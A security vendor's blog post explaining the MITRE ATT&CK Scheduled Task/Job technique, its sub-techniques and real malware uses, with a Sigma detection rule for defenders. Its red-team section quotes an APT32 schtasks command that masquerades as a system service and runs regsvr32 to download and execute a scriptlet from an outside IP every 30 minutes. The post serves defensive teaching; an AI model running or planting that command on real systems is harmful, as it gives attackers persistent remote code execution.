Resources | Picus Security

MITRE ATT&CK T1053 Scheduled Task

Written by Suleyman Ozarslan, PhD | Jun 30, 2020 9:22:00 PM

In 2019, Picus Labs analyzed 48813 malware to determine tactics, techniques, and procedures (TTPs) used by adversaries in these malicious files. Picus Labs categorized each observed TTP by utilizing the MITRE ATT&CK® framework. As a result of the present research, 445018 TTPs observed in the last year were mapped to ATT&CK to identify the top 10 most common techniques used by attackers. Our research has found that Scheduled Task was the seventh most prevalent ATT&CK technique used by adversaries in their malware. 

A scheduled task is a command, program or script to be executed at a particular time in the future (e.g. 11/08/2022 1:00 a.m.), at regular intervals (e.g. every Monday at 1:00 a.m.), or when a defined event occurs (e.g. a user logs on the system).  Legitimate users like system administrators use scheduled tasks to create and run operational tasks automatically. Adversaries also use task scheduling utilities of operating systems to execute malicious payloads on a defined schedule or at system startup to achieve persistence. Our research has found that Scheduled Task was the seventh most prevalent ATT&CK technique used by adversaries in their malware.

In this article, we review:

  • the fundamentals of the Scheduled Task technique
  • updates on the technique in the new version of the ATT&CK framework
  • sub-techniques of the Scheduled Task/Job technique 
  • its use cases by threat actors and malware
  • red and blue team exercises for this technique

Introduction

Operating systems provide utilities to automate the execution of programs or scripts on a defined schedule:

  • schtasks.exe (Microsoft Windows)
  • at.exe (Microsoft Windows)
  • at (Linux)
  • cron (Unix-like operating systems)
  • launchd (macOS)

Updates in the New Version of the MITRE ATT&CK Framework

The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques [1]. MITRE ATT&CK Sub-techniques are a way to describe a specific implementation of a technique in more detail. 

In the new sub-technique version of the MITRE ATT&CK Framework, name of the T1053 Scheduled Task  technique is changed as  T1053 Scheduled Task/Job and new subtechniques are added:

  • At (Windows) was a pre-defined behaviour within T1053 Scheduled Task. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.002 At (Windows).
  • Remaining behaviour in the previous T1053 Scheduled Task became a new sub-technique as T1053.005 Scheduled Task. 
  • The T1168 Local Job Scheduling technique in the previous version is merged into T1053 Scheduled Task/Job:
    • At (Linux) was a pre-defined behaviour within T1168 Local Job Scheduling. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.001 At (Linux).
    • Cron was a pre-defined behaviour within T1168 Local Job Scheduling. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.003 Cron.
  • T1160 Launch Daemon was a technique in the previous version. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.04 Launchd.

Scheduled Task/Job Sub-techniques

1. T1053.001 At (Linux)

at is a command-line utility that allows users to schedule commands in various operating systems, such as Unix-like operating systems (e.g. Linux distributions, macOS and BSD), and Microsoft Windows. This sub-technique covers the at command within Linux, but it may be extended to other Unix-like operating systems.

at utility in Linux allows users to schedule commands to be executed only once at a particular time. An adversary may use at command to schedule one-time execution of malicious code in the future.

2. T1053.002 At (Windows)

Modern Microsoft Windows operating systems provide a graphical user interface (GUI) for Task Scheduler. Moreover, Microsoft Windows offers two native command-line utilities for task scheduling: at.exe and schtasks.exe. 

There are two requirements to use the at command in Windows:

  • The Task Scheduler service must be running.
  • The user must be logged on as a Local Administrator.

Adversaries use at.exe to schedule tasks to create a recurring task to execute at regular intervals. For example, it  can be used to run a reverse shell to keep reverse shell sessions running.

At.exe can be used to run a command on not only the local system but also remote systems. As a real-world example, the TG-0416 Threat Group uses at.exe for lateral movement [2]. BRONZE BUTLER APT group uses the at command to execute a malicious batch file on a remote system during lateral movement.

3. T1053.003 Cron

Cron is a utility in Unix-like operating systems to configure scheduled tasks. It can be used to schedule a command, script or program to execute periodically. As mentioned above, at is also a task scheduling utility in Unix-like OSs. However, they have different use cases. While cron is suitable for repetitive tasks, at is suitable for one time tasks. 

Adversaries use cron to execute their malicious payloads at regular intervals for persistence. As a recent example, attackers use cron to run the downloaded malicious payload every minute in the Ngrok Mining Botnet campaign [3].

4. T1053.004 Launchd

Launchd is the OS service management daemon for macOS that boots the system, and loads and maintains services. It is similar to systemd on Linux distributions and Service ControlManager on Microsoft Windows. 

When a macOS system starts up, launchd is the first process launched after the kernel. Thus, adversaries may use the launchd daemon to schedule their malicious executables to run at system startup. As an example, Olyx macOS backdoor uses launchd to ensure the backdoor executable automatically launches when the user logs in [4].

5. T1053.005 Scheduled Task

This sub-technique refers to Windows Task Scheduler [5].  Windows Task Scheduler is a utility that enables users to schedule execution of commands, scripts or programs according to time-based or event-based triggers. A time-based trigger starts at a certain time or starts at specified time intervals, such as daily, weekly or monthly. An event-based trigger starts at a specific system event, such as when the system starts up or when a user logs on. Task Scheduler also supports multiple triggers, allowing the task to be launched in different ways.

Adversaries may use various methods to access the task scheduler:

    • Running schtasks on the command line (the most common method)
      • E.g. Quakbot banking trojan used schtasks.exe on the command line to create a scheduled task that executes a JavaScript downloader [6]. 
    • Using a .NET wrapper
    • Using the Windows netapi32 library 
      • E.g. Disttrack wiper malware uses the netapi32 library to create a scheduled task to run the payload on the remote system [7]. 
    • Opening Task Scheduler GUI within the Control Panel

Red and Blue Team Exercises

Red Teaming - How to simulate?

In this exercise, we explain a real scheduled task command in a malicious VBA macro in a Word document that was used by the APT32 Threat Group.

This payload was included in the following Word document:

MD5: 6baafffa7bf960dec821b627f9653e44
SHA-1: c944d737dc028d9327dbb95d684ca97232c38620
SHA-256: 1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876


Briefly, the below command in the VBA code embedded in the Word document creates a scheduled task named SystemSoundsServices (mimicking System Sounds Service of Windows) to run Regsvr32.exe every 30 minutes. Regsvr32.exe is used to bypass application whitelisting script protection for executing a Component Object Model (COM) scriptlet that is dynamically downloaded from the given URL.

schtasks.exe  schtasks /create /sc MINUTE /tn "SystemSoundsServices" /tr "\"regsvr32.exe\" /s /n /u /i:http://193.169.245.137:80/g4.ico scrobj.dll" /mo 30 /F 

In conclusion, the given code incorporates following MITRE ATT&CK techniques:

  • T1053.005 Scheduled Task [8]
  • T1036.004 Masquerading: Masquerade Task or Service [8], [9]
  • T1218.010 Signed Binary Proxy Execution: Regsvr32 [8]–[10]
  • T1559.01 Inter-Process Communication: Component Object Model [11]

Blue Teaming - How to detect?

The following Sigma rule can be used to detect creating a scheduled task that runs regsvr32.exe via schtasks.exe.

title: Scheduled Task Creation to Execute Regsvr32
status: experimental
description: Detects the attempt to create a scheduled task that runs regsvr32.exe via schtasks.exe. This technique is commonly utilized for persistence as APT32 Threat Group's usage in its campaigns.
author: Picus Security
references:
   - https://attack.mitre.org/tactics/TA0002/
   - https://attack.mitre.org/tactics/TA0003/
   - https://attack.mitre.org/tactics/TA0004/
   - https://attack.mitre.org/techniques/T1053/
   - https://attack.mitre.org/groups/G0050/
logsource:
    product: windows
    service: security
    definition1: 'Requirements: Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Detailed Tracking\Audit Process Creation'
    definition2: 'Requirements: Group Policy : Computer Configuration\ Administrative Templates\ System\ Audit Process Creation\ Include Command Line'
detection:
    selection:
        EventID: 4688
        NewProcessName: '*\schtasks.exe'
        ProcessCommandLine: '*/create* *regsvr32.exe*'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.persistence
    - attack.privilege_escalation
    - attack.execution
    - attack.ta0002
    - attack.ta0003
    - attack.ta0004
    - attack.g0050
    - attack.t1053

References

“Updates - July 2020.” [Online]. Available: https://attack.mitre.org/resources/updates/updates-july-2020/. [Accessed: 10-Aug-2020]

[2] H. Carvey, “Indicators of lateral movement using at.exe on Windows 7 systems.” [Online]. Available: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems. [Accessed: 13-Aug-2020]

[3] “Website.” [Online]. Available: https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud//where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems. [Accessed: 13-Aug-2020]

[4] Microsoft Corporation, “Backdoor:MacOS_X/Olyx.A.” [Online]. Available: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:MacOS_X/Olyx.A. [Accessed: 13-Aug-2020]

[5] “Scheduled Task/Job: Scheduled Task.” [Online]. Available: https://attack.mitre.org/techniques/T1053/005/. [Accessed: 13-Aug-2020]

[6] Anonymous, “Qakbot levels up with new obfuscation techniques.” [Online]. Available: http://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html. [Accessed: 13-Aug-2020]

[7] R. Falcone, “Shamoon 2: Return of the Disttrack Wiper,” 30-Nov-2016. [Online]. Available: https://unit42.paloaltonetworks.com/unit42-shamoon-2-return-disttrack-wiper/. [Accessed: 14-Aug-2020]

[8] “Scheduled Task/Job: Scheduled Task.” [Online]. Available: https://attack.mitre.org/techniques/T1053/005/. [Accessed: 14-Aug-2020]

[9] S. Özarslan, “MITRE ATT&CK T1036 Masquerading.” [Online]. Available: https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1036-masquerading. [Accessed: 14-Aug-2020]

[10] “Signed Binary Proxy Execution: Regsvr32.” [Online]. Available: https://attack.mitre.org/techniques/T1218/010/. [Accessed: 14-Aug-2020]

[11] “Inter-Process Communication: Component Object Model.” [Online]. Available: https://attack.mitre.org/techniques/T1559/001/. [Accessed: 14-Aug-2020]



 

View full post